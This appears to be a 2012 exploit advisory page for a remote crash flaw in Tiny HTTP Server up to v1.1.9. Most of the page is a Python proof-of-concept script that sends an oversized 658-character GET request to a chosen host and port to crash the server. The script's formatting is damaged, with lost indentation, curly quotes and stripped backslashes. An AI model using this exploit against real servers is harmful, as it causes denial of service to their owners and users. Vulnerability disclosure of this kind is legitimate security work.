Tiny HTTP Server Remote Crash PoC Exploit

Summary

Tiny HTTP Server <=v1.1.9 suffers from remote crash PoC vulnerability

Credit:

The information has been provided by localh0t.


Details

Vulnerable Systems:
 * Tiny HTTP Server <=v1.1.9 import httplib,sys if (len(sys.argv) < 3): print 'nTiny HTTP Server <=v1.1.9 Remote Crash PoC' print 'n Usage: %s <host> <port> n’ %(sys.argv[0])
sys.exit()

payload = ‘X’ * 658

try:
print ‘n[!] Connecting to %s …’ %(sys.argv[1])
httpServ = httplib.HTTPConnection(sys.argv[1] , int(sys.argv[2]))
httpServ.connect()
print ‘[!] Sending payload…’
httpServ.request(‘GET’, ‘/’ + str(payload))
print ‘[!] Exploit succeed. Check %s if crashed.n’ %(sys.argv[1])
except:
print ‘[-] Connection error, exiting…’

httpServ.close()
sys.exit()

Disclosure Timeline:
Published: 2012-02-25

Categories: Exploits